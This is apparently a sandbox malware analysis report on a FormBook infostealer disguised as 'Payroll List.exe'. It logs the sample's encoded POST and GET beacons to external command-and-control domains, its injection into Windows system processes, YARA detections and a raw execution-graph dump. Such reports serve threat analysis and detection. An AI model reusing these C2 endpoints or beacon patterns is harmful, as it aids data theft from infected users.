                                                                  Data Ascii: NjHpTfh=6DLu6QMM1jamKfJLWEved+DrFew7XDzMVOuQDWYCxkGpo33DuF5g6+X5dsEBFiRBE5/yUoRNLONfv5xhDoy/DYej7Ro5QYaeNPP2KYO9szSjNxwfowudl2GJj28zzFOW1W46rvp+Ce5Uq0nT5F8O6iMhTyW//ru+tJHjmVhTEqYtpGk5KKqPaVM9Ko/AH/0xkqELTao=
                                                                  Nov 22, 2024 14:46:53.207158089 CET | 375 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 22 Nov 2024 13:46:52 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  30 | 192.168.2.8 | 49738 | 31.31.196.17 | 80 | 1240 | C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 22, 2024 14:46:54.531384945 CET | 833 | OUT | POST /h26k/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.servannto.site
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 228
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.servannto.site
                                                                  Referer: http://www.servannto.site/h26k/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 36 44 4c 75 36 51 4d 4d 31 6a 61 6d 4c 38 52 4c 55 6e 48 65 52 4f 44 6f 4c 2b 77 37 64 6a 7a 49 56 4a 6d 51 44 58 74 48 78 77 71 70 6f 57 48 44 68 68 74 67 2f 2b 58 35 56 4d 45 49 4c 43 52 4b 45 35 37 41 55 73 52 4e 4c 50 74 66 76 38 64 68 43 59 4f 38 44 49 65 68 77 78 6f 37 55 59 61 65 4e 50 50 32 4b 59 61 44 73 7a 61 6a 4d 46 4d 66 75 55 61 65 73 57 47 57 72 57 38 7a 33 46 4f 53 31 57 35 66 72 75 31 41 43 63 78 55 71 33 7a 54 67 77 49 4e 67 79 4e 6f 4d 43 58 2b 7a 35 37 50 6b 49 44 44 74 7a 39 48 41 72 77 4d 6c 51 56 54 51 6f 69 4a 5a 56 6b 57 4b 72 58 32 43 49 70 5a 2b 4a 55 37 4e 4e 38 53 4c 78 38 46 6d 52 70 42 75 4c 4a 4a 56 66 6c 44 43 35 64 5a
                                                                  Data Ascii: NjHpTfh=6DLu6QMM1jamL8RLUnHeRODoL+w7djzIVJmQDXtHxwqpoWHDhhtg/+X5VMEILCRKE57AUsRNLPtfv8dhCYO8DIehwxo7UYaeNPP2KYaDszajMFMfuUaesWGWrW8z3FOS1W5fru1ACcxUq3zTgwINgyNoMCX+z57PkIDDtz9HArwMlQVTQoiJZVkWKrX2CIpZ+JU7NN8SLx8FmRpBuLJJVflDC5dZ
                                                                  Nov 22, 2024 14:46:55.800420046 CET | 375 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 22 Nov 2024 13:46:55 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  31 | 192.168.2.8 | 49739 | 31.31.196.17 | 80 | 1240 | C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 22, 2024 14:46:57.324260950 CET | 1850 | OUT | POST /h26k/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.servannto.site
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1244
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.servannto.site
                                                                  Referer: http://www.servannto.site/h26k/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 36 44 4c 75 36 51 4d 4d 31 6a 61 6d 4c 38 52 4c 55 6e 48 65 52 4f 44 6f 4c 2b 77 37 64 6a 7a 49 56 4a 6d 51 44 58 74 48 78 78 2b 70 6f 6b 50 44 75 6d 42 67 34 2b 58 35 62 73 45 4e 4c 43 52 74 45 39 66 45 55 73 56 33 4c 4b 70 66 75 65 56 68 4b 4b 71 38 4e 49 65 68 2f 52 6f 36 51 59 62 65 4e 50 2f 71 4b 59 4b 44 73 7a 61 6a 4d 45 63 66 75 41 75 65 71 57 47 4a 6a 32 39 38 7a 46 50 4e 31 57 78 6c 72 75 77 31 43 73 52 55 72 58 6a 54 69 69 67 4e 34 69 4e 71 50 43 57 74 7a 35 6e 55 6b 49 50 68 74 7a 68 74 41 6f 51 4d 6d 78 68 4e 46 71 36 6d 62 54 6b 5a 4a 62 6a 38 4d 61 74 32 67 62 70 50 45 2f 6f 6f 63 6e 63 76 6e 77 4a 68 6a 5a 34 64 48 62 59 4d 4c 75 35 58 6c 4e 31 6b 52 56 5a 70 4e 56 56 79 7a 42 56 72 55 61 2b 77 78 5a 71 37 2f 6c 33 64 6c 6e 79 73 4a 55 72 56 73 78 70 72 77 45 4d 5a 33 6c 2f 58 53 31 2f 65 42 70 47 43 2f 58 46 59 52 63 4e 38 52 64 79 53 2f 44 46 51 6a 6c 2f 4f 59 64 49 64 4b 64 4f 4c 73 49 52 38 73 39 53 6a 57 50 52 78 69 6a 51 42 36 4a 6e 45 2b 67 51 6a 50 49 [TRUNCATED]
                                                                  Data Ascii: NjHpTfh=6DLu6QMM1jamL8RLUnHeRODoL+w7djzIVJmQDXtHxx+pokPDumBg4+X5bsENLCRtE9fEUsV3LKpfueVhKKq8NIeh/Ro6QYbeNP/qKYKDszajMEcfuAueqWGJj298zFPN1Wxlruw1CsRUrXjTiigN4iNqPCWtz5nUkIPhtzhtAoQMmxhNFq6mbTkZJbj8Mat2gbpPE/oocncvnwJhjZ4dHbYMLu5XlN1kRVZpNVVyzBVrUa+wxZq7/l3dlnysJUrVsxprwEMZ3l/XS1/eBpGC/XFYRcN8RdyS/DFQjl/OYdIdKdOLsIR8s9SjWPRxijQB6JnE+gQjPIUki1W578g9EZC3wc3VacExEOVugJZofnFI2ENiCU0mOBx0Sx/FJYtLfjBCMCuWE9ns9FpzRW97oVinqDBgBIbOUf421Q3prl5vhoQZEG4TRYZyHPzx9kuuSfRH9n4jowkGezNzi7TwSkg5eIwvsGKrxTC8usJJ/OIjIvppM8VRdaMq26dk+YagxdkoFp/cQ5D+PP7240f5Wi0ilhKR2Klc4A7HicX3q92HoFI8q/OxkvCmpO1gASL45H9fT9qg2fmYGqTf2HJb+7AAAvNrMC3N83ms7EgRPk8QN6KcDojRAszz6ncl/H5GBxYqvmcEj+e2Dg8e1kp8Z+ib8TSbD+r3WiaeY00QCUT11sxLrQfsyeluVr0QBa+uYYJ28jtNRDLs9ow0mPbc9LnCzieUYRbFYTCbMGTjMAMqGYdOClwfDGNgMdpmgpCFdQ3nSaJtVvVh3loJ7ghN+LSUo5nTsD/F3mudPp7MRf2vhTRulYTDzw2TqDIhVWSeRp+Iw0lE1DdVrEHQLYRUeuZNHWwre/jpzzqCtRu6dB1c1cg9A1rCPC7zvbSgZznyMD5tFrSsQ/DKKz3C9VwI6mVrqWQB25RYY3nhFIoXc/YreMgNogoT+ccy1tqtjNaipGXghxJ/EjMBc4v35d8xYWRAp2pYRVT9dD4eB6Bd4nzk [TRUNCATED]
                                                                  Nov 22, 2024 14:46:58.697161913 CET | 375 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 22 Nov 2024 13:46:58 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  32 | 192.168.2.8 | 49740 | 31.31.196.17 | 80 | 1240 | C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 22, 2024 14:47:00.031788111 CET | 555 | OUT | GET /h26k/?1fo=GF14svyhH44dt&NjHpTfh=3BjO5l4trS+mOtJOU23IMPLHJrJKWDXXfOCWIFV4tkiUomDH7G5wxffcY7A/EhE+G/r5frF5I7R9nf11AZCcJ5+lxyBJff7SJaPEJKSXzAPLDFQjr1SUqUGQs1Ux+2nJpQ== HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.servannto.site
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Nov 22, 2024 14:47:01.304291010 CET | 733 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 22 Nov 2024 13:47:01 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  33 | 192.168.2.8 | 49741 | 64.190.63.222 | 80 | 1240 | C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 22, 2024 14:47:07.265989065 CET | 807 | OUT | POST /ykhz/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.telforce.one
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 208
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.telforce.one
                                                                  Referer: http://www.telforce.one/ykhz/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Ascii: NjHpTfh=TlYXPEdpchGDzLoQjMOGNXR7Ax2yID1B0zQ1U+gj2j63KLpCE/HaBKkvsLs6Qb3Q5n3FSzjKrDp/cXnemgdAwD9L/dLIGyG/8xf8eSRHW/MSCLKZyIDQLH0vzmaANcBg8jMOaBHqHNQJLAdwQA7rwWUP6+OX1Fq4tAKBSG7b6hgr6/IL5ymtIZLOqU1ovW4d2Z7GwdM=
                                                                  Nov 22, 2024 14:47:08.567526102 CET | 707 | IN | HTTP/1.1 405 Not Allowed
                                                                  date: Fri, 22 Nov 2024 13:47:08 GMT
                                                                  content-type: text/html
                                                                  content-length: 556
                                                                  server: Parking/1.0
                                                                  connection: close
                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                  34 | 192.168.2.8 | 49742 | 64.190.63.222 | 80
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 22, 2024 14:47:10.438092947 CET | 827 | OUT | POST /ykhz/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.telforce.one
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 228
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.telforce.one
                                                                  Referer: http://www.telforce.one/ykhz/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Ascii: NjHpTfh=TlYXPEdpchGDyr4QvPmGM3R4PR2ydz1d0zc1U/kz2Wq3KuVCH6zaGKkvnrtwd73h5nq4SyvKrDV/cTjelRdH2T9JqtLKJSG/8xf8eS1hW7oSC7aZzt/TXX0o7GaAJcBa8jMWaFHAHPoJLBtweyDo5WUV++PIlnj9hhy/M1PL6BsFyp5hjQurLZjlqXdeqhl1s6r2uKao2bR4zZOJp7e74NU6xrIC
                                                                  Nov 22, 2024 14:47:11.826364040 CET | 707 | IN | HTTP/1.1 405 Not Allowed
                                                                  date: Fri, 22 Nov 2024 13:47:11 GMT
                                                                  content-type: text/html
                                                                  content-length: 556
                                                                  server: Parking/1.0
                                                                  connection: close
                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->



                                                                  Target ID:0
                                                                  Start time:08:44:00
                                                                  Start date:22/11/2024
                                                                  Path:C:\Users\user\Desktop\Payroll List.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\Payroll List.exe"
                                                                  Imagebase:0x120000
                                                                  File size:1'212'928 bytes
                                                                  MD5 hash:F15D8B7A5271A52273A158FF2F642D12
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:2
                                                                  Start time:08:44:02
                                                                  Start date:22/11/2024
                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\Payroll List.exe"
                                                                  Imagebase:0x90000
                                                                  File size:46'504 bytes
                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1734177353.0000000003760000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1733855292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1734536564.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:4
                                                                  Start time:08:44:25
                                                                  Start date:22/11/2024
                                                                  Path:C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe"
                                                                  Imagebase:0x610000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3292524183.0000000004FB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:5
                                                                  Start time:08:44:27
                                                                  Start date:22/11/2024
                                                                  Path:C:\Windows\SysWOW64\srdelayed.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\SysWOW64\srdelayed.exe"
                                                                  Imagebase:0x850000
                                                                  File size:16'384 bytes
                                                                  MD5 hash:B5F31FDCE1BE4171124B9749F9D2C600
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:08:44:27
                                                                  Start date:22/11/2024
                                                                  Path:C:\Windows\SysWOW64\ktmutil.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\SysWOW64\ktmutil.exe"
                                                                  Imagebase:0x6f0000
                                                                  File size:15'360 bytes
                                                                  MD5 hash:AC387D5962B2FE2BF4D518DD57BA7230
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3292196090.0000000002900000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3291497446.0000000000680000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3291358467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:moderate
                                                                  Has exited:false

                                                                  Target ID:7
                                                                  Start time:08:44:41
                                                                  Start date:22/11/2024
                                                                  Path:C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe"
                                                                  Imagebase:0x610000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3295460520.0000000005260000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:11
                                                                  Start time:08:44:53
                                                                  Start date:22/11/2024
                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                  Imagebase:0x7ff6d20e0000
                                                                  File size:676'768 bytes
                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true


                                                                    Execution Graph

                                                                    Execution Coverage:3.3%
                                                                    Dynamic/Decrypted Code Coverage:1%
                                                                    Signature Coverage:4.7%
                                                                    Total number of Nodes:1732
                                                                    Total number of Limit Nodes:152
95049->95050 95051 122883 95050->95051 95052 12d7f7 48 API calls 95051->95052 95053 12285c 95052->95053 95053->95043 95054->95001 95056 12d7f7 48 API calls 95055->95056 95057 1226b0 95056->95057 95058 12d7f7 48 API calls 95057->95058 95059 12265f 95058->95059 95059->95009 95060->95036 95062 1919ba 95067 13c75a 95062->95067 95066 1919c9 95068 12d7f7 48 API calls 95067->95068 95069 13c7c8 95068->95069 95075 13d26c 95069->95075 95072 13c865 95073 13c881 95072->95073 95078 13d1fa 48 API calls ___crtGetEnvironmentStringsW 95072->95078 95074 140f0a 52 API calls __cinit 95073->95074 95074->95066 95079 13d298 95075->95079 95078->95072 95080 13d28b 95079->95080 95081 13d2a5 95079->95081 95080->95072 95081->95080 95082 13d2ac RegOpenKeyExW 95081->95082 95082->95080 95083 13d2c6 RegQueryValueExW 95082->95083 95084 13d2e7 95083->95084 95085 13d2fc RegCloseKey 95083->95085 95084->95085 95085->95080 95086 1919dd 95091 124a30 95086->95091 95088 1919f1 95111 140f0a 52 API calls __cinit 95088->95111 95090 1919fb 95092 124a40 __ftell_nolock 95091->95092 95093 12d7f7 48 API calls 95092->95093 95094 124af6 95093->95094 95112 125374 95094->95112 95096 124aff 95119 12363c 95096->95119 95099 12518c 48 API calls 95100 124b18 95099->95100 95125 1264cf 95100->95125 95103 12d7f7 48 API calls 95104 124b32 95103->95104 95131 1249fb 95104->95131 95106 124b43 Mailbox 95106->95088 95107 1261a6 48 API calls 95108 124b3d _wcscat Mailbox __wsetenvp 95107->95108 95108->95106 95108->95107 95109 12ce19 48 API calls 95108->95109 95110 1264cf 48 API calls 95108->95110 95109->95108 95110->95108 95111->95090 95145 14f8a0 95112->95145 95115 12ce19 48 API calls 95116 1253a7 95115->95116 95147 12660f 95116->95147 95118 1253b1 Mailbox 95118->95096 95120 123649 __ftell_nolock 95119->95120 95154 12366c GetFullPathNameW 95120->95154 95122 12365a 95123 126a63 48 API calls 95122->95123 95124 123669 95123->95124 95124->95099 95126 12651b 95125->95126 95130 1264dd ___crtGetEnvironmentStringsW 95125->95130 95128 
13f4ea 48 API calls 95126->95128 95127 13f4ea 48 API calls 95129 124b29 95127->95129 95128->95130 95129->95103 95130->95127 95156 12bcce 95131->95156 95134 1941cc RegQueryValueExW 95136 1941e5 95134->95136 95137 194246 RegCloseKey 95134->95137 95135 124a2b 95135->95108 95138 13f4ea 48 API calls 95136->95138 95139 1941fe 95138->95139 95162 1247b7 95139->95162 95142 19423b 95142->95137 95143 194224 95144 126a63 48 API calls 95143->95144 95144->95142 95146 125381 GetModuleFileNameW 95145->95146 95146->95115 95148 14f8a0 __ftell_nolock 95147->95148 95149 12661c GetFullPathNameW 95148->95149 95150 126a63 48 API calls 95149->95150 95151 126643 95150->95151 95152 126571 48 API calls 95151->95152 95153 12664f 95152->95153 95153->95118 95155 12368a 95154->95155 95155->95122 95157 124a0a RegOpenKeyExW 95156->95157 95158 12bce8 95156->95158 95157->95134 95157->95135 95159 13f4ea 48 API calls 95158->95159 95160 12bcf2 95159->95160 95161 13ee75 48 API calls 95160->95161 95161->95157 95163 13f4ea 48 API calls 95162->95163 95164 1247c9 RegQueryValueExW 95163->95164 95164->95142 95164->95143 95165 145dfd 95166 145e09 _fprintf 95165->95166 95202 147eeb GetStartupInfoW 95166->95202 95168 145e0e 95204 149ca7 GetProcessHeap 95168->95204 95170 145e66 95171 145e71 95170->95171 95289 145f4d 47 API calls 3 library calls 95170->95289 95205 147b47 95171->95205 95174 145e77 95176 145e82 __RTC_Initialize 95174->95176 95290 145f4d 47 API calls 3 library calls 95174->95290 95226 14acb3 95176->95226 95178 145e91 95179 145e9d GetCommandLineW 95178->95179 95291 145f4d 47 API calls 3 library calls 95178->95291 95245 152e7d GetEnvironmentStringsW 95179->95245 95182 145e9c 95182->95179 95186 145ec2 95258 152cb4 95186->95258 95189 145ec8 95190 145ed3 95189->95190 95293 14115b 47 API calls 3 library calls 95189->95293 95272 141195 95190->95272 95193 145edb 95194 145ee6 __wwincmdln 95193->95194 95294 14115b 47 API calls 3 library calls 95193->95294 95276 123a0f 95194->95276 95197 145efa 95198 145f09 
